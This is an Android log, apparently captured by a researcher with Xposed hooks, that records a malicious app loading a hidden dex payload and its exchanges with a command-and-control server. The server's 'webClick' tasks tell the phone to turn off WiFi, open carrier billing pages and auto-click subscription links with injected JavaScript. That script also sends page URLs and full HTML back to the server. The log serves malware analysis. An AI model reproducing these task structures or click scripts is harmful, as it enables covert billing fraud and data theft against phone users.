11-20 13:11:00.377 I/Xposed (18830): [+] SERVER: [{"id":349663,"name":"interval","params":{"interval":1800}}]
11-20 13:11:00.419 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"13:11:00 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"349663\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 13:11:00.601 I/Xposed (18830): [+] SERVER: [{"id":334319,"name":"OK"}]
11-20 13:45:24.098 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 13:45:24.688 I/Xposed (18830): [+] SERVER: [{"id":659459,"name":"interval","params":{"interval":1800}}]
11-20 13:45:24.730 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"13:45:24 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"659459\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 13:45:24.906 I/Xposed (18830): [+] SERVER: [{"id":671470,"name":"OK"}]
11-20 14:15:24.759 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:15:25.449 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12d56cdbbf4","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":289784,"name":"interval","params":{"interval":60}}]
11-20 14:16:25.770 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:16:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 14:16:26.235 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:16:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"14:16:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 14:16:26.275 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:16:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"14:16:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"14:16:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"289784\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 14:17:26.269 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:16:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"14:16:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"14:16:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"289784\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 14:17:26.281 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:17:26.765 I/Xposed (18830): [+] SERVER: [{"id":752779,"name":"OK"}]
11-20 14:17:26.821 I/Xposed (18830): [+] SERVER: []
11-20 14:18:26.409 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:18:27.127 I/Xposed (18830): [+] SERVER: []
11-20 14:19:26.363 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:19:27.033 I/Xposed (18830): [+] SERVER: []
11-20 14:20:26.330 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:20:26.857 I/Xposed (18830): [+] SERVER: []
11-20 14:21:26.299 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:21:26.825 I/Xposed (18830): [+] SERVER: [{"id":968940,"name":"interval","params":{"interval":1800}}]
11-20 14:21:26.901 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:21:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"968940\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 14:21:27.065 I/Xposed (18830): [+] SERVER: [{"id":502281,"name":"OK"}]
11-20 14:38:06.013 I/Xposed (18750): [+] Target application found: en.cold.jewel.th.lines
11-20 14:38:06.175 I/Xposed (18750): [!] BaseDexClassLoader has been called: /data/data/en.cold.jewel.th.lines/files/bbd884c8-619b-4401-811f-ec4df7e914be.apk
11-20 14:38:06.175 I/Xposed (18750): [!] openDexFile has been called: /data/data/en.cold.jewel.th.lines/files/bbd884c8-619b-4401-811f-ec4df7e914be.apk, /data/data/en.cold.jewel.th.lines/files/bbd884c8-619b-4401-811f-ec4df7e914be.dex
11-20 14:38:06.839 I/Xposed (18750): [!] ClassLoader.loadClass has been called: infiltration.Main$V19
11-20 14:38:06.840 I/Xposed (18750): [i] Installing (classToHook) hook on: infiltration.Main$V19.install(ClassLoader c, List l, File f)
11-20 14:38:06.846 I/Xposed (18750): [+] install (V19) hit!
11-20 14:38:06.847 I/Xposed (18750): [!] openDexFile has been called: /data/data/en.cold.jewel.th.lines/files/bbd884c8-619b-4401-811f-ec4df7e914be.apk, /data/data/en.cold.jewel.th.lines/files/bbd884c8-619b-4401-811f-ec4df7e914be.dex
11-20 14:38:06.857 I/Xposed (18750): [i] Installing hook on: infiltration.oI2nTR2.OpJii28pAi06ZoYxrJlBF2gW(String s)
11-20 14:38:06.860 I/Xposed (18750): [i] Installing hook on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PrivateKey k)
11-20 14:38:06.862 I/Xposed (18750): [i] Installing hook on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PublicKey k)
11-20 14:38:06.868 I/Xposed (18750): [i] Installing hook (classToHook) on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.jNWow5lMF5gpMRlovjqsFg()
11-20 14:38:06.905 I/Xposed (18750): [!] MultiDex.install has been called
11-20 14:51:26.915 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 14:51:27.530 I/Xposed (18750): [+] SERVER: [{"id":441066,"name":"interval","params":{"interval":1800}}]
11-20 14:51:27.591 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"14:51:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"441066\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 14:51:27.763 I/Xposed (18750): [+] SERVER: [{"id":542863,"name":"OK"}]
11-20 15:21:27.695 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:21:28.517 I/Xposed (18750): [+] SERVER: [{"id":866034,"name":"interval","params":{"interval":1800}}]
11-20 15:21:28.581 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:21:28 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"866034\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 15:21:28.758 I/Xposed (18750): [+] SERVER: [{"id":710352,"name":"OK"}]
11-20 15:51:28.557 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:51:29.194 I/Xposed (18750): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12ebefa1c8f","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":453408,"name":"interval","params":{"interval":60}}]
11-20 15:51:29.335 I/Xposed (18750): [!] BaseDexClassLoader has been called: /data/app/com.google.android.webview-1/base.apk
11-20 15:51:29.335 I/Xposed (18750): [!] openDexFile has been called: /data/app/com.google.android.webview-1/base.apk, null
11-20 15:51:29.995 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"453408\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 15:52:29.393 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"453408\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 15:52:29.404 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 15:52:30.072 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"453408\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:52:30 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 15:53:29.390 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:51:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"453408\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:52:30 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 15:53:29.403 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:53:29.958 I/Xposed (18750): [+] SERVER: [{"id":814644,"name":"OK"}]
11-20 15:53:30.013 I/Xposed (18750): [+] SERVER: []
11-20 15:54:29.420 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:54:30.007 I/Xposed (18750): [+] SERVER: []
11-20 15:55:29.448 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:55:30.019 I/Xposed (18750): [+] SERVER: []
11-20 15:56:29.460 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:56:30.127 I/Xposed (18750): [+] SERVER: []
11-20 15:57:29.480 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 15:57:30.066 I/Xposed (18750): [+] SERVER: [{"id":331908,"name":"interval","params":{"interval":1800}}]
11-20 15:57:30.132 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:57:30 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"331908\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 15:57:30.317 I/Xposed (18750): [+] SERVER: [{"id":198966,"name":"OK"}]
11-20 16:27:30.212 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:27:32.239 I/Xposed (18750): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12f46288209","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":568098,"name":"interval","params":{"interval":60}}]
11-20 16:27:32.333 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:27:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 16:28:32.583 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:27:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:27:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"568098\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:28:32 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 16:28:32.588 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 16:29:32.608 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:29:32.615 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:27:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:27:32 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"568098\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:28:32 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 16:29:34.481 I/Xposed (18750): [+] SERVER: [{"id":750762,"name":"OK"}]
11-20 16:29:34.501 I/Xposed (18750): [+] SERVER: []
11-20 16:30:32.646 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:30:34.897 I/Xposed (18750): [+] SERVER: []
11-20 16:31:32.669 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:31:33.888 I/Xposed (18750): [+] SERVER: []
11-20 16:32:32.706 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:32:33.259 I/Xposed (18750): [+] SERVER: []
11-20 16:33:32.723 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 16:33:33.389 I/Xposed (18750): [+] SERVER: [{"id":564581,"name":"interval","params":{"interval":1800}}]
11-20 16:33:33.443 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:33:33 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"564581\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 16:33:33.624 I/Xposed (18750): [+] SERVER: [{"id":205621,"name":"OK"}]
11-20 17:03:33.513 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 17:03:34.703 I/Xposed (18750): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12fcd523e2f","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":305790,"name":"interval","params":{"interval":60}}]
11-20 17:03:34.802 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 17:04:35.100 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"305790\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:04:34 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 17:04:42.090 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"305790\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:04:34 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 17:04:42.103 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 17:05:42.152 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 17:05:42.161 I/Xposed (18750): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:03:34 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"305790\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:04:34 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
